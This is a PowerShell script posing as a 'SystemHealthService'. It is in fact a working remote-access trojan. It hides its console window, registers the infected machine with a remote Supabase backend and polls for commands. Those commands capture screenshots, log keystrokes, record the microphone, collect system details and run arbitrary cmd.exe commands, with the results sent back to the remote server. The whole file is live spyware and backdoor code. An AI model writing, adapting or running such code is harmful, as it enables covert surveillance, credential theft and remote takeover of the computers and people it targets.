$ErrorActionPreference="SilentlyContinue";$ProgressPreference="SilentlyContinue"
try{Add-Type -Name W -Namespace N -MemberDefinition '[DllImport("Kernel32.dll")]public static extern IntPtr GetConsoleWindow();[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr h,Int32 n);';[N.W]::ShowWindow([N.W]::GetConsoleWindow(),0)}catch{}
$p="C:\ProgramData\SystemHealthService";$kb="$p\kb.tmp";while(!(Test-Connection -ComputerName "8.8.8.8" -Count 1 -Quiet)){Start-Sleep 5};Start-Sleep 5
$cfg=Get-Content "$p\config.json" -Raw|ConvertFrom-Json;$idf="$p\device_id.txt"
if(Test-Path $idf){$did=(Get-Content $idf -Raw).Trim()}else{$did=[guid]::NewGuid().ToString();$did|Out-File $idf -NoNewline;(Get-Item $idf).Attributes="Hidden"}
$dn=-join((65..90)+(97..122)|Get-Random -Count 8|%{[char]$_})
$h=@{"apikey"=$cfg.supabase_key;"Authorization"="Bearer $($cfg.supabase_key)";"Content-Type"="application/json";"Prefer"="return=minimal"}
function I{param($e,$m="GET",$b=$null);$uri="$($cfg.supabase_url)/rest/v1/$e";try{if($b){Invoke-RestMethod -Uri $uri -Method $m -Headers $h -Body ($b|ConvertTo-Json -Depth 10 -Compress) -TimeoutSec 30}else{Invoke-RestMethod -Uri $uri -Method $m -Headers $h -TimeoutSec 30}}catch{$null}}
$r=@{device_id=$did;device_name=$dn;hostname=$env:COMPUTERNAME;username=$env:USERNAME;os_info=(Get-CimInstance Win32_OperatingSystem).Caption};I -e "devices" -m "POST" -b $r
function D{try{Add-Type -AssemblyName System.Windows.Forms,System.Drawing;$s=[System.Windows.Forms.Screen]::PrimaryScreen.Bounds;$b=New-Object System.Drawing.Bitmap($s.Width,$s.Height);$g=[System.Drawing.Graphics]::FromImage($b);$g.CopyFromScreen($s.Location,[System.Drawing.Point]::Empty,$s.Size);$m=New-Object System.IO.MemoryStream;$b.Save($m,[System.Drawing.Imaging.ImageFormat]::Png);$x=[Convert]::ToBase64String($m.ToArray());$g.Dispose();$b.Dispose();$m.Dispose();@{data_type="display";file_data=$x}}catch{@{data_type="display";data="Failed"}}}
function K{param($dur=60);try{Add-Type -AssemblyName System.Windows.Forms;Add-Type -MemberDefinition '[DllImport("user32.dll")]public static extern short GetAsyncKeyState(int v);' -Name KS -Namespace U -EA SilentlyContinue;""|Out-File $kb -NoNewline;$end=(Get-Date).AddSeconds($dur);while((Get-Date) -lt $end){for($v=8;$v -le 190;$v++){if([U.KS]::GetAsyncKeyState($v) -eq -32767){$k=[System.Windows.Forms.Keys]$v;Add-Content $kb "$k " -NoNewline}};Start-Sleep -Milliseconds 50};$kd=Get-Content $kb -Raw -EA SilentlyContinue;Remove-Item $kb -Force -EA SilentlyContinue;if($kd){@{data_type="input";data=$kd}}else{@{data_type="input";data="[No keystrokes recorded]"}}}catch{@{data_type="input";data="Error: $_"}}}
function S{try{$os=Get-CimInstance Win32_OperatingSystem;$c=Get-CimInstance Win32_ComputerSystem;@{data_type="sysinfo";data=(@{hostname=$env:COMPUTERNAME;username=$env:USERNAME;os=$os.Caption;os_version=$os.Version;manufacturer=$c.Manufacturer;model=$c.Model;memory_gb=[math]::Round($c.TotalPhysicalMemory/1GB,2)}|ConvertTo-Json -Compress)}}catch{$null}}
function V{param($dur=10);try{$af="$p\rec.wav";Add-Type -TypeDefinition 'using System;using System.Runtime.InteropServices;public class AR{[DllImport("winmm.dll",EntryPoint="mciSendStringA")]public static extern int mciSendString(string c,string b,int s,IntPtr h);}' -Language CSharp -EA SilentlyContinue;[AR]::mciSendString("open new Type waveaudio Alias rs","",0,[IntPtr]::Zero);[AR]::mciSendString("set rs bitspersample 16","",0,[IntPtr]::Zero);[AR]::mciSendString("set rs samplespersec 22050","",0,[IntPtr]::Zero);[AR]::mciSendString("set rs channels 1","",0,[IntPtr]::Zero);[AR]::mciSendString("record rs","",0,[IntPtr]::Zero);Start-Sleep $dur;[AR]::mciSendString("stop rs","",0,[IntPtr]::Zero);[AR]::mciSendString("save rs `"$af`"","",0,[IntPtr]::Zero);[AR]::mciSendString("close rs","",0,[IntPtr]::Zero);if(Test-Path $af){$ab=[System.IO.File]::ReadAllBytes($af);$x=[Convert]::ToBase64String($ab);Remove-Item $af -Force -EA SilentlyContinue;@{data_type="audio";file_data=$x}}else{@{data_type="audio";data="Failed"}}}catch{@{data_type="audio";data="$_"}}}
function C{param($cmd);try{$pi=New-Object System.Diagnostics.ProcessStartInfo;$pi.FileName="cmd.exe";$pi.Arguments="/c $cmd";$pi.RedirectStandardOutput=$true;$pi.RedirectStandardError=$true;$pi.UseShellExecute=$false;$pi.CreateNoWindow=$true;$pr=New-Object System.Diagnostics.Process;$pr.StartInfo=$pi;$pr.Start()|Out-Null;$o=$pr.StandardOutput.ReadToEnd();$e=$pr.StandardError.ReadToEnd();$pr.WaitForExit(30000);@{data_type="cmd_result";data=(@{command=$cmd;output=$o;error=$e;exit_code=$pr.ExitCode}|ConvertTo-Json -Compress)}}catch{@{data_type="cmd_result";data=(@{command=$cmd;error="$_"}|ConvertTo-Json -Compress)}}}
$si=if($cfg.sync_interval){$cfg.sync_interval}else{10};$ri=if($cfg.retry_interval){$cfg.retry_interval}else{10}
while($true){try{I -e "devices?device_id=eq.$did" -m "PATCH" -b @{last_sync=(Get-Date -Format "o")}|Out-Null;$ts=I -e "tasks?device_id=eq.$did&status=eq.pending&select=id,task_type,task_params";if($ts){if($ts -isnot [array]){$ts=@($ts)};foreach($t in $ts){I -e "tasks?id=eq.$($t.id)" -m "PATCH" -b @{status="processing"}|Out-Null;$tl=$null;switch($t.task_type){"display_capture"{$tl=D}"input_monitor"{$dur=60;if($t.task_params -and $t.task_params.duration){$dur=[int]$t.task_params.duration};$tl=K -dur $dur}"system_info"{$tl=S}"voice_capture"{$dur=10;if($t.task_params -and $t.task_params.duration){$dur=[int]$t.task_params.duration};$tl=V -dur $dur}"cmd_exec"{$cmd="";if($t.task_params -and $t.task_params.command){$cmd=$t.task_params.command};if($cmd){$tl=C -cmd $cmd}else{$tl=@{data_type="cmd_result";data="No command"}}}};if($tl){$bd=@{device_id=$did;data_type=$tl.data_type};if($tl.file_data){$bd.file_data=$tl.file_data};if($tl.data){$bd.data=$tl.data};I -e "telemetry" -m "POST" -b $bd|Out-Null;I -e "tasks?id=eq.$($t.id)" -m "PATCH" -b @{status="complete";completed_at=(Get-Date -Format "o")}|Out-Null}}};Start-Sleep $si}catch{Start-Sleep $ri}}
